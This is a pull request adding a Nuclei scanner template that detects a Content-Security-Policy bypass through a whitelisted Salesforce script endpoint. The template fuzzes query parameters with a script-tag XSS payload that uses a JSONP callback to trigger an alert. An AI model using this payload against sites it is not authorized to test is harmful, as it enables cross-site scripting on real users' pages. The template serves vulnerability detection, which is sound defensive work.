### PR TITLE
feat(template): add Salesforce CSP bypass detection

### DIFF
--- a/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
@@ -39,7 +39,7 @@ headless:
 
     payloads:
       injection:
-        - '<script src="https://omtr2.partners.salesforce.com"></script>'
+        - '<script src="https://omtr2.partners.salesforce.com/id?callback=alert"></script>'
 
     fuzzing:
       - part: query

--- a/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
@@ -1,0 +1,54 @@
+id: salesforce-csp-bypass
+
+info:
+  name: Content-Security-Policy Bypass - salesforce
+  author: Jaenact
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,salesforce-api
+
+flow: http(1) && headless(1)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Security-Policy"
+          - "salesforce.com"
+        condition: and
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+
+      - action: waitdialog
+        name: salesforce_csp_xss
+        args:
+          max-duration: 5s
+
+    payloads:
+      injection:
+        - '<script src="https://omtr2.partners.salesforce.com"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "salesforce_csp_xss == true"


### PR DESCRIPTION
**This pull request introduces a new Nuclei template to detect a Content-Security-Policy (CSP) bypass vulnerability via the `salesforce.com` domain.**

The template identifies misconfigurations where a web application's CSP whitelists `salesforce.com` (specifically `omtr2.partners.salesforce.com`), which exposes a script endpoint. This can be exploited to execute arbitrary JavaScript if the target is vulnerable to HTML injection, leading to Cross-Site Scripting (XSS).

## References

- This template is based on the research and data provided by the [renniepak/CSPBypass](https://github.com/renniepak/CSPBypass) repository.  
- The specific endpoint was added in commit [add omtr2.partners.salesforce.com](https://github.com/renniepak/CSPBypass/commit/e6a5b533591835a58ffbb1de089a79b7fa0e872e).  

## Additional References

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)  
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)  
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)  
- [PD-Community Discord server](https://discord.gg/projectdiscovery)  